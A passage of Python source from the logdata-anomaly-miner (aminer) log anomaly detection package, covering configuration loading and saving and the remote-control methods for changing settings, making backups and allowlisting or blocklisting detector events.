log_data_resource_dict.items(): try: if not log_data_resource.open(reopen_flag=True): continue except OSError as open_os_error: if open_os_error.errno == errno.EACCES: msg = f"{program_name}: no permission to access {log_resouce_name}" print(msg, file=sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) else: msg = f"{program_name}: unexpected error reopening {log_resouce_name}: {open_os_error.errno} " \ f"({os.strerror(open_os_error.errno)})" print(msg, file=sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) exit_status = 2 continue SecureOSFunctions.send_logstream_descriptor(parent_socket, log_data_resource.get_file_descriptor(), log_resouce_name) log_data_resource.close() time.sleep(1) parent_socket.close() SecureOSFunctions.close_base_directory() SecureOSFunctions.close_log_directory() sys.exit(exit_status) main() logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/000077500000000000000000000000001437606560100272075ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/AminerConfig.py000066400000000000000000000237451437606560100321350ustar00rootroot00000000000000"""This module collects static configuration item keys and configuration loading and handling functions. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import os import sys import importlib.util import logging KEY_LOG_SOURCES_LIST = 'LogResourceList' KEY_AMINER_USER = 'AminerUser' KEY_AMINER_GROUP = 'AminerGroup' KEY_ANALYSIS_CONFIG_FILE = 'AnalysisConfigFile' KEY_PERSISTENCE_DIR = 'Core.PersistenceDir' KEY_LOG_DIR = 'Core.LogDir' DEFAULT_PERSISTENCE_DIR = '/var/lib/aminer' DEFAULT_LOG_DIR = '/var/lib/aminer/log' KEY_PERSISTENCE_PERIOD = 'Core.PersistencePeriod' DEFAULT_PERSISTENCE_PERIOD = 600 KEY_REMOTE_CONTROL_SOCKET_PATH = 'RemoteControlSocket' KEY_LOG_PREFIX = 'LogPrefix' KEY_RESOURCES_MAX_MEMORY_USAGE = 'Resources.MaxMemoryUsage' REMOTE_CONTROL_LOG_NAME = 'REMOTE_CONTROL' KEY_REMOTE_CONTROL_LOG_FILE = 'Log.RemoteControlLogFile' DEFAULT_REMOTE_CONTROL_LOG_FILE = 'aminerRemoteLog.txt' configFN = None STAT_LEVEL = 1 STAT_LOG_NAME = 'STAT' KEY_STAT_LOG_FILE = 'Log.StatisticsFile' DEFAULT_STAT_LOG_FILE = 'statistics.log' DEBUG_LEVEL = 1 DEBUG_LOG_NAME = 'DEBUG' KEY_DEBUG_LOG_FILE = 'Log.DebugFile' DEFAULT_DEBUG_LOG_FILE = 'aminer.log' KEY_LOG_STAT_PERIOD = 'Log.StatisticsPeriod' DEFAULT_STAT_PERIOD = 3600 KEY_LOG_STAT_LEVEL = 'Log.StatisticsLevel' KEY_LOG_DEBUG_LEVEL = 'Log.DebugLevel' KEY_LOG_ROTATION_MAX_BYTES = 'Log.Rotation.MaxBytes' DEFAULT_LOG_ROTATION_MAX_BYTES = 2 << 19 # 1 Megabyte KEY_LOG_ROTATION_BACKUP_COUNT = 'Log.Rotation.BackupCount' DEFAULT_LOG_ROTATION_BACKUP_COUNT = 5 CONFIG_KEY_LOG_LINE_PREFIX = 'LogPrefix' DEFAULT_LOG_LINE_PREFIX = '' CONFIG_KEY_ENCODING = 'Log.Encoding' ENCODING = 'utf-8' def load_config(config_file_name): """Load the configuration file using the import module.""" aminer_config = None # skipcq: PYL-W0603 global configFN configFN = config_file_name ymlext = ['.YAML', '.YML', '.yaml', '.yml'] extension = os.path.splitext(config_file_name)[1] yaml_config = None if extension in ymlext: yaml_config = config_file_name config_file_name = os.path.dirname(os.path.abspath(__file__)) + '/' + 'YamlConfig.py' try: spec = importlib.util.spec_from_file_location('aminer_config', config_file_name) aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) if extension in ymlext: # skipcq: FLK-E722 aminer_config.load_yaml(yaml_config) except ValueError as e: logging.getLogger(DEBUG_LOG_NAME).error(e) raise e except Exception: msg = f"Failed to load configuration from {config_file_name}" print(msg, file=sys.stderr) logging.getLogger(DEBUG_LOG_NAME).error(msg) exception_info = sys.exc_info() logging.getLogger(DEBUG_LOG_NAME).error(exception_info) raise Exception(exception_info[0], exception_info[1], exception_info[2]) return aminer_config def build_persistence_file_name(aminer_config, *args): """Build the full persistence file name from persistence directory configuration and path parts.""" persistence_dir_name = aminer_config.config_properties.get(KEY_PERSISTENCE_DIR, DEFAULT_PERSISTENCE_DIR) return os.path.join(persistence_dir_name, *args) def save_config(analysis_context, new_file): """Save the current configuration to a file by using the aminerRemoteControl.""" register_component = 'register_component(' VAR_ID = 0 msg = "" with open(configFN, "r") as file: old = file.read() for config_property in analysis_context.aminer_config.config_properties: find_str = f"config_properties['{config_property}'] = " pos = old.find(find_str) if pos == -1: msg += f"WARNING: {find_str}not found in the old config file.\n" rc_logger = logging.getLogger(REMOTE_CONTROL_LOG_NAME) rc_logger.warning(msg.strip('\n')) else: string = old[pos + len(find_str):] old_len = string.find('\n') string = string[:old_len] prop = analysis_context.aminer_config.config_properties[config_property] if (string[0] == "'" and string[-1] == "'") or (string[0] == '"' and string[-1] == '"'): prop = "'" + prop + "'" if f"{string}" != f"{prop}": old = old[:pos + len(find_str)] + f"{prop}" + old[pos + len(find_str) + old_len:] for component_id in analysis_context.get_registered_component_ids(): component = analysis_context.get_component_by_id(component_id) name = analysis_context.get_name_by_component(component) start = 0 old_start = 0 for i in range(0, component_id + 1): start = start + 1 start = old.find('.register_component(', start) if old_start > start: break old_start = start if old.find('component_name', start) < old.find(')', start): old_component_name_start = old.find('"', old.find('component_name', start)) old_component_name_end = old.find('"', old_component_name_start + 1) if old_component_name_start > old.find(')', start) or old_component_name_start == -1: old_component_name_start = old.find("'", old.find('component_name', start)) old_component_name_end = old.find("'", old_component_name_start + 1) old_len = old_component_name_end - old_component_name_start + 1 old_component_name = old[old_component_name_start:] old_component_name = old_component_name[:old_len] if old_component_name != f'"{name}"': old = old[:old_component_name_start] + f'"{name}"' + old[old_component_name_end + 1:] log_dir = analysis_context.aminer_config.config_properties.get(KEY_LOG_DIR, DEFAULT_LOG_DIR) remote_control_log_file = analysis_context.aminer_config.config_properties.get( KEY_REMOTE_CONTROL_LOG_FILE, os.path.join(log_dir, DEFAULT_REMOTE_CONTROL_LOG_FILE)) try: with open(remote_control_log_file, "r") as logFile: logs = logFile.readlines() except OSError as e: msg = f"Could not read {remote_control_log_file}: {e}\n" logging.getLogger(DEBUG_LOG_NAME).error(msg.strip('\n')) print(msg, file=sys.stderr) i = len(logs) - 1 while i > 0: if "INFO aminer started." in logs[i]: logs = logs[i:] break i = i - 1 for i, log in enumerate(logs): if "REMOTECONTROL change_attribute_of_registered_analysis_component" in log: log = log[:log.find('#')] arr = log.split(',', 3) if arr[1].find("'") != -1: component_name = arr[1].split("'")[1] else: component_name = arr[1].split('"')[1] if arr[2].find("'") != -1: attr = arr[2].split("'")[1] else: attr = arr[2].split('"')[1] value = arr[3].strip().split(")")[0] pos = old.find(f'component_name="{component_name}"') if pos == -1: pos = old.find(f"component_name='{component_name}'") while old[pos] != '\n': pos = pos - 1 pos = old.find(register_component, pos) + len(register_component) var = old[pos:old.find(',', pos)] pos = old.find(f"{var} =") if pos == -1: pos = old.find(f"{var}=") pos = old.find(attr, pos) p1 = old.find(")", pos) p2 = old.find(",", pos) if -1 not in (p1, p2): end = min(old.find(")", pos), old.find(",", pos)) elif p1 == -1 and p2 == -1: msg += f"WARNING: '{component_name}.{attr}' could not be found in the current config!\n" rc_logger = logging.getLogger(REMOTE_CONTROL_LOG_NAME) rc_logger.warning(msg.strip('\n')) continue elif p1 == -1: end = p2 elif p2 == -1: end = p1 old = old[:old.find("=", pos) + 1] + f"{value}" + old[end:] if "REMOTECONTROL add_handler_to_atom_filter_and_register_analysis_component" in log: parameters = log.split(",", 2) # find the name of the filter_config variable in the old config. pos = old.find(parameters[1].strip()) new_pos = pos while old[new_pos] != '\n': new_pos = new_pos - 1 filter_config = old[new_pos:pos] pos = filter_config.find(register_component) + len(register_component) filter_config = filter_config[pos:filter_config.find(',', pos)].strip() new_parameters = parameters[2].split(")") component_name = new_parameters[1].strip(', ') var = f"analysis_component{VAR_ID}" VAR_ID = VAR_ID + 1 old = old + f"\n {var} = {new_parameters[0].strip()})" old = old + f"\n {filter_config}.register_component({var}, component_name={component_name})" old = old + f"\n {filter_config}.add_handler({var})\n" # remove double lines old = old.replace('\n\n\n', '\n\n') try: with open(new_file, "w") as file: file.write(old) msg += f"Successfully saved the current config to {new_file}." logging.getLogger(DEBUG_LOG_NAME).info(msg) return msg except FileNotFoundError: msg += f"FAILURE: file '{new_file}' could not be found or opened!" logging.getLogger(DEBUG_LOG_NAME).error(msg) return msg AminerRemoteControlExecutionMethods.py000066400000000000000000001211031437606560100366400ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer"""This module contains methods which can be executed from the aminerRemoteControl class. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import aminer import resource import os import shutil from time import time from datetime import datetime import logging import re from aminer.input.InputInterfaces import AtomHandlerInterface from aminer.util import PersistenceUtil from aminer import AnalysisChild, AminerConfig from aminer.AminerConfig import KEY_PERSISTENCE_PERIOD, KEY_LOG_STAT_LEVEL, KEY_LOG_DEBUG_LEVEL, KEY_LOG_STAT_PERIOD,\ KEY_RESOURCES_MAX_MEMORY_USAGE, KEY_LOG_PREFIX, KEY_PERSISTENCE_DIR, DEFAULT_PERSISTENCE_DIR, KEY_LOG_SOURCES_LIST, DEBUG_LOG_NAME attr_str = '"%s": %s,\n' component_not_found = 'Event history component not found.' class AminerRemoteControlExecutionMethods: """This class defines all possible methods for the remote control.""" REMOTE_CONTROL_RESPONSE = '' ERROR_MESSAGE_RESOURCE_NOT_FOUND = '"Resource \\"%s\\" could not be found."' CONFIG_KEY_MAIL_TARGET_ADDRESS = 'MailAlerting.TargetAddress' CONFIG_KEY_MAIL_FROM_ADDRESS = 'MailAlerting.FromAddress' CONFIG_KEY_MAIL_SUBJECT_PREFIX = 'MailAlerting.SubjectPrefix' CONFIG_KEY_MAIL_ALERT_GRACE_TIME = 'MailAlerting.AlertGraceTime' CONFIG_KEY_EVENT_COLLECT_TIME = 'MailAlerting.EventCollectTime' CONFIG_KEY_ALERT_MIN_GAP = 'MailAlerting.MinAlertGap' CONFIG_KEY_ALERT_MAX_GAP = 'MailAlerting.MaxAlertGap' CONFIG_KEY_ALERT_MAX_EVENTS_PER_MESSAGE = 'MailAlerting.MaxEventsPerMessage' MAIL_CONFIG_PROPERTIES = [CONFIG_KEY_MAIL_TARGET_ADDRESS, CONFIG_KEY_MAIL_FROM_ADDRESS] INTEGER_CONFIG_PROPERTY_LIST = [ CONFIG_KEY_MAIL_ALERT_GRACE_TIME, CONFIG_KEY_EVENT_COLLECT_TIME, CONFIG_KEY_ALERT_MIN_GAP, CONFIG_KEY_ALERT_MAX_GAP, CONFIG_KEY_ALERT_MAX_EVENTS_PER_MESSAGE, KEY_PERSISTENCE_PERIOD, KEY_LOG_STAT_LEVEL, KEY_LOG_DEBUG_LEVEL, KEY_LOG_STAT_PERIOD, KEY_RESOURCES_MAX_MEMORY_USAGE ] STRING_CONFIG_PROPERTY_LIST = [ CONFIG_KEY_MAIL_TARGET_ADDRESS, CONFIG_KEY_MAIL_FROM_ADDRESS, CONFIG_KEY_MAIL_SUBJECT_PREFIX, KEY_LOG_PREFIX ] def print_response(self, value): """Add a value to the response string.""" self.REMOTE_CONTROL_RESPONSE += str(value) def change_config_property(self, analysis_context, property_name, value): """Change a config_property in an running aminer instance.""" result = 0 config_keys_mail_alerting = [ self.CONFIG_KEY_MAIL_TARGET_ADDRESS, self.CONFIG_KEY_MAIL_FROM_ADDRESS, self.CONFIG_KEY_MAIL_SUBJECT_PREFIX, self.CONFIG_KEY_EVENT_COLLECT_TIME, self.CONFIG_KEY_ALERT_MIN_GAP, self.CONFIG_KEY_ALERT_MAX_GAP, self.CONFIG_KEY_ALERT_MAX_EVENTS_PER_MESSAGE, self.CONFIG_KEY_MAIL_ALERT_GRACE_TIME] if not isinstance(analysis_context, AnalysisChild.AnalysisContext): self.REMOTE_CONTROL_RESPONSE += f"FAILURE: the analysis_context must be of type {AnalysisChild.AnalysisContext.__class__}." return if property_name not in self.INTEGER_CONFIG_PROPERTY_LIST + self.STRING_CONFIG_PROPERTY_LIST: self.REMOTE_CONTROL_RESPONSE += f"FAILURE: the property '{property_name}' does not exist in the current config!" return if property_name in self.INTEGER_CONFIG_PROPERTY_LIST: t = int else: t = str if not isinstance(value, t): self.REMOTE_CONTROL_RESPONSE += f"FAILURE: the value of the property '{property_name}' must be of type {t}!" return if property_name in [KEY_PERSISTENCE_DIR, KEY_LOG_SOURCES_LIST]: self.REMOTE_CONTROL_RESPONSE += f"FAILURE: the property '{property_name}' can only be changed at startup in the aminer root" \ f" process!" return if property_name == KEY_RESOURCES_MAX_MEMORY_USAGE: result = self.change_config_property_max_memory(analysis_context, value) elif property_name in config_keys_mail_alerting: result = self.change_config_property_mail_alerting(analysis_context, property_name, value) elif property_name in (KEY_LOG_PREFIX, KEY_PERSISTENCE_PERIOD, KEY_LOG_STAT_PERIOD): analysis_context.aminer_config.config_properties[property_name] = value result = 0 elif property_name == KEY_LOG_STAT_LEVEL: result = self.change_config_property_log_stat_level(analysis_context, value) elif property_name == KEY_LOG_DEBUG_LEVEL: result = self.change_config_property_log_debug_level(analysis_context, value) else: self.REMOTE_CONTROL_RESPONSE += f"FAILURE: property {property_name} could not be changed. Please check the property_name again." return if result == 0: msg = f"'{property_name}' changed to '{value}' successfully." self.REMOTE_CONTROL_RESPONSE += msg logging.getLogger(DEBUG_LOG_NAME).info(msg) def change_config_property_mail_alerting(self, analysis_context, property_name, value): """Change any mail property.""" is_email = re.compile(r"(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)|^[a-zA-Z0-9]+@localhost$") if property_name in self.MAIL_CONFIG_PROPERTIES and not is_email.match(value): self.REMOTE_CONTROL_RESPONSE += "FAILURE: MailAlerting.TargetAddress and MailAlerting.FromAddress must be email addresses!" return 1 analysis_context.aminer_config.config_properties[property_name] = value for analysis_component_id in analysis_context.get_registered_component_ids(): component = analysis_context.get_component_by_id(analysis_component_id) if component.__class__.__name__ == "DefaultMailNotificationEventHandler": setattr(component, property_name, value) return 0 def change_config_property_max_memory(self, analysis_context, max_memory_mb): """Change the maximal allowed RAM usage of the aminer instance.""" try: max_memory_mb = int(max_memory_mb) if max_memory_mb < 32 and max_memory_mb != -1: self.REMOTE_CONTROL_RESPONSE += "FAILURE: it is not safe to run the aminer with less than 32MB RAM." return 1 resource.setrlimit(resource.RLIMIT_AS, (max_memory_mb * 1024 * 1024, resource.RLIM_INFINITY)) analysis_context.aminer_config.config_properties[KEY_RESOURCES_MAX_MEMORY_USAGE] = max_memory_mb return 0 except ValueError: self.REMOTE_CONTROL_RESPONSE += "FAILURE: property 'maxMemoryUsage' must be of type Integer!" return 1 def change_config_property_log_stat_level(self, analysis_context, stat_level): """Set the statistic logging level.""" if stat_level in (0, 1, 2): analysis_context.aminer_config.config_properties[KEY_LOG_STAT_LEVEL] = stat_level AminerConfig.STAT_LEVEL = stat_level return 0 self.REMOTE_CONTROL_RESPONSE += f"FAILURE: STAT_LEVEL {stat_level} is not allowed. Allowed STAT_LEVEL values are 0, 1, 2." return 1 def change_config_property_log_debug_level(self, analysis_context, debug_level): """Set the debug log level.""" if debug_level in (0, 1, 2): analysis_context.aminer_config.config_properties[KEY_LOG_DEBUG_LEVEL] = debug_level AminerConfig.DEBUG_LEVEL = debug_level debug_logger = logging.getLogger(DEBUG_LOG_NAME) if debug_level == 0: debug_logger.setLevel(logging.ERROR) elif debug_level == 1: debug_logger.setLevel(logging.INFO) else: debug_logger.setLevel(logging.DEBUG) return 0 self.REMOTE_CONTROL_RESPONSE += f"FAILURE: DEBUG_LEVEL {debug_level} is not allowed. Allowed DEBUG_LEVEL values are 0, 1, 2." return 1 def change_attribute_of_registered_analysis_component(self, analysis_context, component_name, attribute, value): """ Change a specific attribute of a registered component. @param analysis_context the analysis context of the aminer. @param component_name the name to be registered in the analysis_context. @param attribute the name of the attribute to be printed. @param value the new value of the attribute. """ attr = getattr(analysis_context.get_component_by_name(component_name), attribute) if type(attr) is type(value): setattr(analysis_context.get_component_by_name(component_name), attribute, value) msg = f"'{component_name}.{attribute}' changed from {repr(attr)} to {value} successfully." self.REMOTE_CONTROL_RESPONSE += msg logging.getLogger(DEBUG_LOG_NAME).info(msg) else: self.REMOTE_CONTROL_RESPONSE += f"FAILURE: property '{component_name}.{attribute}' must be of type {type(attr)}!" def rename_registered_analysis_component(self, analysis_context, old_component_name, new_component_name): """ Rename an analysis component by removing and readding it to the analysis_context. @param analysis_context the analysis context of the aminer. @param old_component_name the current name of the component. @param new_component_name the new name of the component. """ if type(old_component_name) is not str or type(new_component_name) is not str: self.REMOTE_CONTROL_RESPONSE = "FAILURE: the parameters 'old_component_name' and 'new_component_name' must be of type str." else: component = analysis_context.get_component_by_name(old_component_name) if component is None: self.REMOTE_CONTROL_RESPONSE += f"FAILURE: the component '{old_component_name}' does not exist." else: analysis_context.registered_components_by_name[old_component_name] = None analysis_context.registered_components_by_name[new_component_name] = component msg = f"Component '{old_component_name}' renamed to '{new_component_name}' successfully." self.REMOTE_CONTROL_RESPONSE += msg logging.getLogger(DEBUG_LOG_NAME).info(msg) def print_config_property(self, analysis_context, property_name): """ Print a specific config property. @param analysis_context the analysis context of the aminer. @param property_name the name of the property to be printed. """ if property_name not in analysis_context.aminer_config.config_properties: self.REMOTE_CONTROL_RESPONSE = self.ERROR_MESSAGE_RESOURCE_NOT_FOUND % property_name return val = analysis_context.aminer_config.config_properties[property_name] if isinstance(val, list): val = str(val).replace('"False"', 'false').replace('"True"', 'true').replace('"None"', 'null').strip(' ').replace("'", '"') else: val = str(val).replace('"False"', 'false').replace('"True"', 'true').replace('"None"', 'null').strip(' ') if val.isdigit(): val = int(val) elif '.' in val: try: val = float(val) except ValueError: # skipcq: FLK-E722 pass self.REMOTE_CONTROL_RESPONSE = f'"{property_name}": {val}' def print_attribute_of_registered_analysis_component(self, analysis_context, component_name, attribute): """ Print a specific attribute of a registered component. @param analysis_context the analysis context of the aminer. @param component_name the name to be registered in the analysis_context. @param attribute the name of the attribute to be printed. """ if type(component_name) is not str or type(attribute) is not str: self.REMOTE_CONTROL_RESPONSE += "FAILURE: the parameters 'component_name' and 'attribute' must be of type str." return if analysis_context.get_component_by_name(component_name) is None: self.REMOTE_CONTROL_RESPONSE += f"FAILURE: the component '{component_name}' does not exist." return if hasattr(analysis_context.get_component_by_name(component_name), attribute): attr = getattr(analysis_context.get_component_by_name(component_name), attribute, None) if isinstance(attr, set): attr = list(attr) if hasattr(attr, '__dict__') and self.isinstance_aminer_class(attr): new_attr = self.get_all_vars(attr, ' ') if isinstance(new_attr, str): new_attr = f'"{new_attr}"' self.REMOTE_CONTROL_RESPONSE += f'"{component_name}.{attribute}": {new_attr}' elif isinstance(attr, list): self.REMOTE_CONTROL_RESPONSE += f'"{component_name}.{attribute}": [' for at in attr: if hasattr(at, '__dict__') and self.isinstance_aminer_class(at): new_attr = "\n[\n " + at.__class__.__name__ + " {\n" + self.get_all_vars(at, ' ') + " }\n]" else: if isinstance(at, str): new_attr = f'"{at}"' else: new_attr = str(at) self.REMOTE_CONTROL_RESPONSE += f"{new_attr}, " self.REMOTE_CONTROL_RESPONSE = self.REMOTE_CONTROL_RESPONSE.rstrip(", ") self.REMOTE_CONTROL_RESPONSE += "]" else: if attr is None or isinstance(attr, (str, bool)): attr = f'"{attr}"' self.REMOTE_CONTROL_RESPONSE += f'"{component_name}.{attribute}": {attr}' self.REMOTE_CONTROL_RESPONSE = self.REMOTE_CONTROL_RESPONSE.replace('"False"', 'false').replace('"True"', 'true').replace( '"None"', 'null') else: self.REMOTE_CONTROL_RESPONSE += f"FAILURE: the component '{component_name}' does not have an attribute named '{attribute}'." def print_current_config(self, analysis_context): """ Print the entire aminer config. @param analysis_context the analysis context of the aminer. """ for config_property in analysis_context.aminer_config.config_properties: if isinstance(analysis_context.aminer_config.config_properties[config_property], str): self.REMOTE_CONTROL_RESPONSE += f'"{config_property}": ' \ f'"{analysis_context.aminer_config.config_properties[config_property]}",\n' else: self.REMOTE_CONTROL_RESPONSE += attr_str % ( config_property, analysis_context.aminer_config.config_properties[config_property]) for component_id in analysis_context.get_registered_component_ids(): self.REMOTE_CONTROL_RESPONSE += \ f'"{analysis_context.get_name_by_component(analysis_context.get_component_by_id(component_id))}": ' + '{\n' component = analysis_context.get_component_by_id(component_id) self.REMOTE_CONTROL_RESPONSE += self.get_all_vars(component, ' ') self.REMOTE_CONTROL_RESPONSE += "},\n\n" self.REMOTE_CONTROL_RESPONSE = self.REMOTE_CONTROL_RESPONSE.replace("'", '"').replace('"False"', 'false').replace( '"True"', 'true').replace('"None"', 'null').replace('\\"', "'").rstrip(',\n\n\n') + '\n\n' def get_all_vars(self, obj, indent): """Return all variables in string representation.""" result = '' for var in vars(obj): attr = getattr(obj, var, None) if attr is not None and isinstance(attr, (tuple, set)): attr = list(attr) if attr is not None and hasattr(attr, '__dict__') and self.isinstance_aminer_class(attr): result += indent + '"%s": {\n' % var + self.get_all_vars(attr, indent + ' ') + indent + "},\n" elif isinstance(attr, list): for at in attr: if hasattr(at, '__dict__') and self.isinstance_aminer_class(at): result += indent + '"%s": {\n' % var + indent + ' "' + at.__class__.__name__ + \ '": {\n' + self.get_all_vars(at, indent + ' ') + indent + ' ' + "}\n" + indent + '},\n' else: rep = _reformat_attr(attr) result += indent + attr_str % (var, rep) break else: rep = _reformat_attr(attr) result += indent + attr_str % (var, rep) return result.rstrip(',\n') + '\n' @staticmethod def isinstance_aminer_class(obj): """Test if an object is of an instance of a aminer class.""" class_list = [ aminer.analysis.AtomFilters.SubhandlerFilter, aminer.analysis.AtomFilters.MatchPathFilter, aminer.analysis.AtomFilters.MatchValueFilter, aminer.analysis.HistogramAnalysis.LinearNumericBinDefinition, aminer.analysis.HistogramAnalysis.BinDefinition, aminer.analysis.HistogramAnalysis.ModuloTimeBinDefinition, aminer.analysis.Rules.MatchAction, aminer.analysis.Rules.MatchRule, aminer.analysis.HistogramAnalysis.HistogramData, aminer.analysis.TimeCorrelationViolationDetector.CorrelationRule, aminer.analysis.TimeCorrelationDetector.CorrelationFeature, aminer.events.EventInterfaces.EventHandlerInterface, aminer.util.History.ObjectHistory] for c in class_list: if isinstance(obj, c): return True return False def save_current_config(self, analysis_context, destination_file): """ Save the current live config into a file. @param analysis_context the analysis context of the aminer. @param destination_file the path to the file in which the config is saved. """ if re.match("^(/[^/ ]*)+/?$", destination_file) is not None: msg = AminerConfig.save_config(analysis_context, destination_file) else: msg = f"Exception: {destination_file} is not a valid filename!" self.REMOTE_CONTROL_RESPONSE = msg logging.getLogger(DEBUG_LOG_NAME).info(msg) def persist_all(self): """Persist all data by calling the function in PersistenceUtil.""" PersistenceUtil.persist_all() self.REMOTE_CONTROL_RESPONSE = 'OK' logging.getLogger(DEBUG_LOG_NAME).info('Called persist_all() via remote control.') def create_backup(self, analysis_context): """Create a backup with the current datetime string.""" backup_time = time() backup_time_str = datetime.fromtimestamp(backup_time).strftime('%Y-%m-%d-%H-%M-%S') persistence_dir = analysis_context.aminer_config.config_properties[KEY_PERSISTENCE_DIR] persistence_dir = persistence_dir.rstrip('/') backup_path = persistence_dir + '/backup/' backup_path_with_date = os.path.join(backup_path, backup_time_str) shutil.copytree(persistence_dir, backup_path_with_date, ignore=shutil.ignore_patterns('backup*')) msg = f"Created backup {backup_time_str}" self.REMOTE_CONTROL_RESPONSE = f"Created backup {backup_time_str}" logging.getLogger(DEBUG_LOG_NAME).info(msg) def list_backups(self, analysis_context): """List all available backups from the persistence directory.""" persistence_dir = analysis_context.aminer_config.config_properties.get(KEY_PERSISTENCE_DIR, DEFAULT_PERSISTENCE_DIR) for _dirpath, dirnames, _filenames in os.walk(os.path.join(persistence_dir, 'backup')): self.REMOTE_CONTROL_RESPONSE = f'"backups": {dirnames}' break self.REMOTE_CONTROL_RESPONSE = self.REMOTE_CONTROL_RESPONSE.replace("'", '"') def allowlist_event_in_component(self, analysis_context, component_name, event_data, allowlisting_data=None): """ Allowlists one or multiple specific events from the history in the component it occurred in. @param analysis_context the analysis context of the aminer. @param component_name the name to be registered in the analysis_context. @param event_data the event_data for the allowlist_event method. @param allowlisting_data this data is passed on into the allowlist_event method. """ component = analysis_context.get_component_by_name(component_name) if component is None: self.REMOTE_CONTROL_RESPONSE += f"FAILURE: component '{component}' does not exist!" return if component.__class__.__name__ not in [ "EnhancedNewMatchPathValueComboDetector", "MissingMatchPathValueDetector", "NewMatchPathDetector", "NewMatchPathValueComboDetector", "NewMatchIdValueComboDetector", "EventCorrelationDetector", "NewMatchPathValueDetector"]: self.REMOTE_CONTROL_RESPONSE += \ f"FAILURE: component class '{component.__class__.__name__}' does not support allowlisting! Only the following classes " \ f"support allowlisting: EnhancedNewMatchPathValueComboDetector, MissingMatchPathValueDetector, NewMatchPathDetector," \ f" NewMatchIdValueComboDetector, NewMatchPathValueComboDetector, NewMatchPathValueDetector and EventCorrelationDetector." return try: msg = component.allowlist_event(f"Analysis.{component.__class__.__name__}", event_data, allowlisting_data) self.REMOTE_CONTROL_RESPONSE += msg logging.getLogger(DEBUG_LOG_NAME).info(msg) # skipcq: PYL-W0703 except Exception as e: self.REMOTE_CONTROL_RESPONSE += "Exception: " + repr(e) def blocklist_event_in_component(self, analysis_context, component_name, event_data, blocklisting_data=None): """ Blocklists one or multiple specific events from the history in the component it occurred in. @param analysis_context the analysis context of the aminer. @param component_name the name to be registered in the analysis_context. @param event_data the event_data for the allowlist_event method. @param blocklisting_data this data is passed on into the blocklist_event method. """ component = analysis_context.get_component_by_name(component_name) if component is None: self.REMOTE_CONTROL_RESPONSE += f"FAILURE: component '{component}' does not exist!" return if component.__class__.__name__ not in ["EventCorrelationDetector"]: self.REMOTE_CONTROL_RESPONSE += f"FAILURE: component class '{component.__class__.__name__}' does not support blocklisting!" \ f" Only the following classes support blocklisting: EventCorrelationDetector." return try: msg = component.blocklist_event(f"Analysis.{component.__class__.__name__}", event_data, blocklisting_data) self.REMOTE_CONTROL_RESPONSE += msg logging.getLogger(DEBUG_LOG_NAME).info(msg) # skipcq: PYL-W0703 except Exception as e: self.REMOTE_CONTROL_RESPONSE += "Exception: " + repr(e) def print_persistency_event_in_component(self, analysis_context, component_name, event_data): """ Prints the persistency specified in event_data of component_name. @param analysis_context the analysis context of the aminer. @param component_name the name to be registered in the analysis_context. @param event_data the event_data for the print_persistency_event method. """ component = analysis_context.get_component_by_name(component_name) if component is None: self.REMOTE_CONTROL_RESPONSE += f"FAILURE: component '{component}' does not exist!" return if component.__class__.__name__ not in ["EventFrequencyDetector", "MinimalTransitionTimeDetector", "PathValueTimeIntervalDetector"]: self.REMOTE_CONTROL_RESPONSE += \ f"FAILURE: component class '{component.__class__.__name__}' does not support the print_persistency_event! Only the " \ f"following classes support it: EventFrequencyDetector, MinimalTransitionTimeDetector and PathValueTimeIntervalDetector." return try: msg = component.print_persistence_event(f"Analysis.{component.__class__.__name__}", event_data) self.REMOTE_CONTROL_RESPONSE += msg logging.getLogger(DEBUG_LOG_NAME).info(msg) # skipcq: PYL-W0703 except Exception as e: self.REMOTE_CONTROL_RESPONSE += "Exception: " + repr(e) def add_to_persistency_event_in_component(self, analysis_context, component_name, event_data): """ Add information specified in event_data to the persistency of component_name. @param analysis_context the analysis context of the aminer. @param component_name the name to be registered in the analysis_context. @param event_data the event_data for the add_to_persistency_event method. """ component = analysis_context.get_component_by_name(component_name) if component is None: self.REMOTE_CONTROL_RESPONSE += f"FAILURE: component '{component}' does not exist!" return if component.__class__.__name__ not in ["NewMatchPathValueComboDetector", "MinimalTransitionTimeDetector", "PathValueTimeIntervalDetector"]: self.REMOTE_CONTROL_RESPONSE += \ f"FAILURE: component class '{component.__class__.__name__}' does not support the add_to_persistency_event! Only the " \ f"following classes support it: NewMatchPathValueComboDetector, MinimalTransitionTimeDetector and" \ f" PathValueTimeIntervalDetector." return try: msg = component.add_to_persistence_event(f"Analysis.{component.__class__.__name__}", event_data) self.REMOTE_CONTROL_RESPONSE += msg logging.getLogger(DEBUG_LOG_NAME).info(msg) # skipcq: PYL-W0703 except Exception as e: self.REMOTE_CONTROL_RESPONSE += "Exception: " + repr(e) def remove_from_persistency_event_in_component(self, analysis_context, component_name, event_data): """ Remove information specified in event_data from the persistency of component_name. @param analysis_context the analysis context of the aminer. @param component_name the name to be registered in the analysis_context. @param event_data the event_data for the remove_from_persistency_event method. """ component = analysis_context.get_component_by_name(component_name) if component is None: self.REMOTE_CONTROL_RESPONSE += f"FAILURE: component '{component}' does not exist!" return if component.__class__.__name__ not in ["MinimalTransitionTimeDetector", "PathValueTimeIntervalDetector"]: self.REMOTE_CONTROL_RESPONSE += \ f"FAILURE: component class '{component.__class__.__name__}' does not support the remove_from_persistency_event! Only the " \ f"following classes support it: 